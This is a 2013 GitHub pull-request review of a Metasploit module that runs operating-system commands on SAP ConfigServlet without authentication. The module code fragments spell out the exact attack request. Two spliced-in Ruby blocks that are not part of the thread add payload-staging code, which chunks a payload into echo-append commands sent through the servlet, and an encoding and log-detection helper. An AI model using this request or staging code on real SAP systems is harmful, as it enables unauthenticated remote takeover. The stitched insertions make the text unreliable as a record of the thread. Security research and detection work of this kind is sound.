SAP ConfigServlet OS command execution module #1740

Closed
wants to merge 6 commits into base: master
3 participants
@andrewkabai
Contributor

andrewkabai commented Apr 18, 2013

This module allows execution of operating system commands through the
SAP ConfigServlet without any authentication.

The vulnerability was discovered by ERPScan's team, it was presented on Hacker Halted 2012 conference:
http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf

SAP ConfigServlet OS Command Execution module
This module allows execution of operating system commands through the
SAP ConfigServlet without any authentication.
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since this module isn't a scanner, I would recommend not using the Scanner mixin here.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Still better, I would recommend switching to an exploit module :P Sorry, I commented before a full module review.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

I used the Scanner mixin because I had to execute OS commands on several machines at the same time, and I was able to use RHOSTS for 'services -p 50000 -R' this way. Could you recommend another solution? Btw, it is OK to remove the Scanner mixin.

], self.class)
end
def run_host(ip)

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

If the Scanner mixin isn't used it should switch to "def run"

def initialize(info = {})
super(update_info(info,
'Name' => 'SAP ConfigServlet OS Command Execution',

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since it allows OS command execution, it would be nice to switch to an exploit module. Even a CMD arch module would be nice. Is there any difficulty in putting it as an exploit? Feel free to provide or ask for feedback :)

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

see my next comment below

register_options(
[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Since there isn't a generic cmd payload for Windows, the CMD option could remain on an exploit, allowing user-specified command execution when specified. So the module would benefit from payloads, but also from the flexibility of letting the user specify arbitrary commands :)

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

Basically I agree with your opinion, but as the target could run on Linux and Windows machines as well, and because the vulnerability is simple OS command execution, the solution could be complex. The payload must be split into several parts (because of the GET request length limitation), the parts must be concatenated through OS command execution (echo 'xxx' >> targetfile) and after that it must be executed, and of course the path to the temporary file and the execution method also depend on the target OS. So it is possible, but not as easy as just executing one simple OS command. I will try to create an exploit module for your needs, but I'm not sure if I will have enough time and access to the vulnerable environment to perform tests. I suggest leaving this module as a simple one-OS-command-execution aux module for now, and I will try to create a new exploit module later. What do you think?
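The staging approach sketched in the comment above (split the payload into GET-sized pieces, append each piece to a file with echo, then run something OS-specific on the result), as an added Ruby example. This is not the PR's module and not the author's later exploit: the request-line budget, the chunk size, the base64 staging encoding, the staging file names and the sample payload are all assumptions of this example, and the final decode/execute step is left to the caller because, as the comment says, it depends on the target OS. ERB::Util.url_encode from the standard library stands in for Rex::Text.uri_encode.

```ruby
require 'base64'
require 'erb'

# Added example, not the PR's module: stage a payload through the
# single-command primitive by splitting it into pieces that each fit in one
# GET request and appending them to a file with echo, as described above.
SERVLET_PATH = '/ctc/servlet/ConfigServlet'
EXEC_PREFIX  = 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE='
MAX_REQUEST_LINE = 1024 # assumed request-line budget; tune for the real target
CHUNK = 200             # base64 characters per echo, chosen to stay under the budget

# One echo command per chunk. The first uses '>' to create (or truncate) the
# staging file, the rest use '>>' to append. Quoting differs per OS.
def echo_append_cmds(payload, file, os)
  b64 = Base64.strict_encode64(payload)
  b64.scan(/.{1,#{CHUNK}}/).each_with_index.map do |chunk, i|
    redir = i.zero? ? '>' : '>>'
    os == :windows ? "echo #{chunk}#{redir}#{file}" : "echo '#{chunk}'#{redir}#{file}"
  end
end

# Request path for one command, with the command percent-encoded the way the
# module does it: only the CMDLINE value, so the servlet's ';' separators stay literal.
def configservlet_uri(cmd)
  SERVLET_PATH + '?' + EXEC_PREFIX + ERB::Util.url_encode(cmd)
end

# The full request list: the echo commands followed by whatever OS-specific
# decode/execute commands the caller supplies in +finish+ (that step is left open here).
def stage_requests(payload, file:, os:, finish: [])
  (echo_append_cmds(payload, file, os) + finish).map do |cmd|
    uri = configservlet_uri(cmd)
    raise ArgumentError, "request line too long (#{uri.size} > #{MAX_REQUEST_LINE})" if uri.size > MAX_REQUEST_LINE
    uri
  end
end

# Simulates what the echoes would leave in the staging file, so the chunking
# can be checked for a clean round trip before anything is sent.
def reassemble(cmds)
  b64 = cmds.map { |c| c[/\Aecho '?([A-Za-z0-9+\/=]+)'?>/, 1] }.compact.join
  Base64.strict_decode64(b64)
end

# Constructed stand-in for a binary (a two-byte header plus padding), not a real payload.
SAMPLE_PAYLOAD = 'MZ'.b + "\x90".b * 600

if __FILE__ == $0
  cmds = echo_append_cmds(SAMPLE_PAYLOAD, 'C:\Windows\Temp\stage.b64', :windows)
  puts "#{cmds.size} echo requests, round trip ok: #{reassemble(cmds) == SAMPLE_PAYLOAD}"
  puts stage_requests(SAMPLE_PAYLOAD, file: '/tmp/stage.b64', os: :linux).first
end
```

The round-trip check in reassemble is the part worth keeping whatever the delivery details end up being: a chunk boundary or quoting mistake shows up locally instead of as a corrupt file on the target.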

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

I would say, go ahead and try the exploit module :) We love exploit modules over CMD exec aux modules when possible.

There are other ARCH_CMD exploits which use the URL to deliver the payload, so it should work (maybe there are extra limitations because of the SAP environment I'm not aware of). For example, check awstats_configdir_exec.rb.

On the other hand, it can be more difficult than the auxiliary module, that's true. If you would like, I could provide help and/or feedback if necessary while developing the exploit. I guess it's exploiting the NetWeaver J2EE platform, am I right? If that's the case, do you know if there is any free demo or trial publicly available I could use to test that?

Anyway, if there are other difficulties which make the exploit really hard or not feasible, the cmd aux module can be accepted for sure.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

I don't know about any publicly available demo. My opinion is the following: because the aux module with simple OS command execution is OS independent, I would like to correct this module based on your notes and submit it that way as it is (it will be ready in one day).
On the other hand, during the following days I will create an exploit module that will be able to execute payloads, but only for Windows, because in my environment I have only Windows targets and I can perform tests only on them.

@wchen-r7

wchen-r7 Apr 19, 2013

Contributor

It's ok if you only have Windows for testing.

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

If it's right for @wchen-r7, it's right for me :)

[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Please use the TARGETURI datastore option which is used by the Msf::Exploit::Remote::HttpClient mixin.

print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Please use normalize_uri to build the url_path. And also use "get_params" to specify the GET params to send_request_cgi. Feel free to check:

https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient

which is a nice reference about how to use the HttpClient mixin.

Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
OptBool.new('SSL', [true, 'Use SSL', false])

@wchen-r7

wchen-r7 Apr 19, 2013

Contributor

Is this needed? I thought the default was false.

andrewkabai added some commits Apr 19, 2013

remove Scanner mixin
remove Scanner mixin because this module is not a scanner module
improve URI path and parameter handling
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to prepare the query string (instead of
vars_get, which escapes the necessary semicolons)
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

The Rank field isn't needed on auxiliary modules

{
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

Is there any way to forbid send_request_cgi from escaping special characters in vars_get? In this case, if I put the current query string into vars_get, then the necessary semicolons will be encoded, and that is bad for me.
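The encoding point raised in the review comment about normalize_uri and get_params, and in the question just above about vars_get escaping the semicolons, plus the defensive side of the same detail, as an added Ruby example that is not the module's code. It uses the standard library (ERB::Util.url_encode, URI.decode_www_form_component) in place of Rex, so minor encoding details may differ from Rex::Text.uri_encode; the servlet path and the EXECUTE_CMD parameter come from the PR, while the access-log lines are constructed for the example.

```ruby
require 'erb'
require 'uri'

SERVLET_PATH = '/ctc/servlet/ConfigServlet'
EXEC_PREFIX  = 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE='

# Query as the module builds it: the semicolons stay literal because the
# servlet uses them as separators; only the command value is percent-encoded.
def raw_query(cmd)
  EXEC_PREFIX + ERB::Util.url_encode(cmd)
end

# What a key/value encoder (vars_get style) does to the same parameter: the
# whole value is encoded, so ';' becomes %3B and '=' becomes %3D.
def kv_encoded_query(cmd)
  'param=' + ERB::Util.url_encode("com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=#{cmd}")
end

# Constructed access-log lines (common log format), not real traffic: one
# literal request, one benign page, one %3B-encoded request, one bare servlet hit.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [22/Apr/2013:10:01:12 +0000] "GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami HTTP/1.1" 200 512
  10.0.0.6 - - [22/Apr/2013:10:02:30 +0000] "GET /irj/portal HTTP/1.1" 200 8831
  10.0.0.7 - - [22/Apr/2013:10:03:01 +0000] "GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig%3BEXECUTE_CMD%3BCMDLINE%3Dipconfig%20%2Fall HTTP/1.1" 200 2048
  10.0.0.8 - - [22/Apr/2013:10:04:44 +0000] "GET /ctc/servlet/ConfigServlet HTTP/1.1" 401 0
LOG

REQUEST_RE = /"(?:GET|POST)\s+(\S+)\s+HTTP\//

# Malformed %-sequences would raise; keep the raw string so the line is still inspected.
def percent_decode(s)
  URI.decode_www_form_component(s)
rescue ArgumentError
  s
end

# Flags ConfigServlet requests carrying the EXECUTE_CMD operation. Decoding
# first means the %3B-encoded variant is caught as well as the literal one.
def find_configservlet_exec(log_text)
  log_text.each_line.map do |line|
    m = REQUEST_RE.match(line)
    next unless m
    decoded = percent_decode(m[1])
    next unless decoded.include?('/ConfigServlet') && decoded.include?('EXECUTE_CMD')
    { ip: line[/\A\S+/], uri: m[1], cmd: decoded[/CMDLINE=(.*)\z/, 1] }
  end.compact
end

if __FILE__ == $0
  puts "module-style query:  #{raw_query('ipconfig /all')}"
  puts "vars_get-style query: #{kv_encoded_query('ipconfig /all')}"
  find_configservlet_exec(SAMPLE_LOG).each { |h| puts "#{h[:ip]} ran: #{h[:cmd]}" }
end
```

The two query builders show the reviewer's and the author's point side by side: the servlet needs the literal ';' separators, so the parameter has to go through a raw query string rather than a key/value encoder. The detector decodes before matching for the same reason, so a request that arrives either way is flagged.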

@jvazquez-r7

Contributor

jvazquez-r7 commented Apr 19, 2013

It's not msftidy compliant at this moment; the msftidy warnings should be fixed:

$ tools/msftidy.rb modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb 
sap_configservlet_exec_noauth.rb:39 - [WARNING] Spaces at EOL
'Andras Kabai' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>

@jvazquez-r7

jvazquez-r7 Apr 19, 2013

Contributor

Is there any CVE, OSVDB and/or BID reference for this vulnerability? Just asking :) If there is, it would be nice to add it.

@andrewkabai

andrewkabai Apr 19, 2013

Contributor

As far as I know, there is no other reference to this vulnerability yet.

@jvazquez-r7

Contributor

jvazquez-r7 commented Apr 19, 2013

Hi @andrewkabai, do you mind sharing a pcap of the module working, for verification? Since I don't find any free trial / edition of SAP Java, I guess it would be the easiest way to verify it and be able to proceed with merging :) Feel free to use email if that would be better for you: juan.vazquez [at] metasploit.com

@andrewkabai

Contributor

andrewkabai commented Apr 19, 2013

Hi @jvazquez-r7, sure, I don't mind, but I can access the vulnerable environment on Monday. I will send the pcap via email.

@jvazquez-r7

Contributor

jvazquez-r7 commented Apr 19, 2013

Sounds good! thanks very much!

@andrewkabai

Contributor

andrewkabai commented Apr 22, 2013

I sent the validation pcap via email!

@jvazquez-r7

Contributor

jvazquez-r7 commented Apr 22, 2013

Hi @andrewkabai

pcap verified and looks fine! The module is mainly ready to be merged! Thanks very much for your collaboration!

But I've just noticed you're using your master branch to do the pull request. I'm going to need to ask you to do a new pull request, using a new branch on your repo, to avoid problems when merging into the rapid7 repository.

To do it properly, just create a new branch from your master branch. For example:

git checkout master
git checkout -b sap_portal_configservlet

Write the new module, then add the new module, in the new branch, to your local repository and push it to your origin:

git add modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
git commit -m "Add module for SAP Portal cmd exec"
git push origin sap_portal_configservlet

Then proceed to do the pull request against the rapid7 repository, but using the new branch. I've just tried to provide sample commands. You can carefully review how to proceed with pull requests in the documentation available at the wiki: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment

Please don't hesitate to contact me if you have any doubt. In the meanwhile I'm going to close this pull request because it cannot be merged.

Thanks very much!

juan
